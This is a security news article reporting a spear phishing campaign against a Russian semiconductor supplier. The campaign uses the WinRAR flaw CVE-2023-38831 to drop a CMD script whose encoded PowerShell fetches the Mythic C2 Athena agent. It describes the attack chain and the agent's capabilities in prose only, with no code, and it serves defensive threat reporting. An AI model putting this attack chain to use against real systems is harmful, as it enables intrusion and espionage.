Researchers from Cyble Research and Intelligence Labs (CRIL) have uncovered a targeted spear phishing attack on a prominent Russian semiconductor supplier.
The threat actors behind this attack utilized a critical Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deploy their payload.
This malicious payload, Athena agent of the Mythic C2 framework designed to grant complete control over compromised systems.
The Athena Agent Capabilities and Features
The Athena Agent is equipped with an extensive tool of pre-installed commands tailored to perform various actions on the targeted systems.
Designed using crossplatform version of .NET (not to be confused with .Net Framework), it is a “fully-featured cross-platform agent” for Mythic 3.0 and newer.
Athena comes loaded with features, such as Crossplatform for Windows, Linux, and OSX, SOCKS5 Support, Reverse Port Forwarding, Reflective loading of Assemblies, Modular loading of commands and much more.
These actions encompass injecting assembly, executing Shellcode, capturing authentication details, loading Beacon Object Files (BOFs), and an array of other functionalities. This tool serves as a critical component in the attacker’s toolkit.
Following this, Group-IB Threat Intelligence unit found an undisclosed vulnerability related to ZIP file processing in WinRAR.
The RARLAB team swiftly addressed this vulnerability, releasing the final updated iteration of WinRAR (version 6.23) on August 2, 2023. This vulnerability, designated as CVE-2023-38831, became the focal point for a wave of attacks.
Following the discovery, the exploit quickly gained traction within the dark web community. Malicious actors, including AegisCrypter, began offering this exploit for sale.
Additionally, a Proof-of-Concept (POC) for this exploit became publicly accessible on GitHub, leading to its integration into various attacker toolkits.
Technical analysis of Athena campaign
The exploit’s widespread adoption led to its incorporation by multiple threat actors, including the notorious APT-36 group, known for targeting Indian government organizations and defense contractors.
Moreover, CRIL also found the spear phishing campaign leveraging phishing emails to target these victims in Russia. Disguised as an official communication from the Ministry of Industry and Trade of Russia, the email contained a deceptive archive file named “resultati_sovehchaniya_11_09_2023.rar.”
This file, exploiting the CVE-2023-38831 vulnerability, was the vehicle for delivering the Athena Agent. The vulnerability in question triggers an unusual behavior in WinRAR, leading to the extraction of a malicious CMD script alongside the intended benign file. This script, containing a Base64-encoded PowerShell script, orchestrates the download and execution of the Athena Agent.
The Athena Agent is an essential component of the Mythic C2 framework, providing a collaborative and user-friendly interface for operators. Its cross-platform compatibility and diverse set of functionalities make it an invaluable asset for threat actors seeking to gain control over compromised systems.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.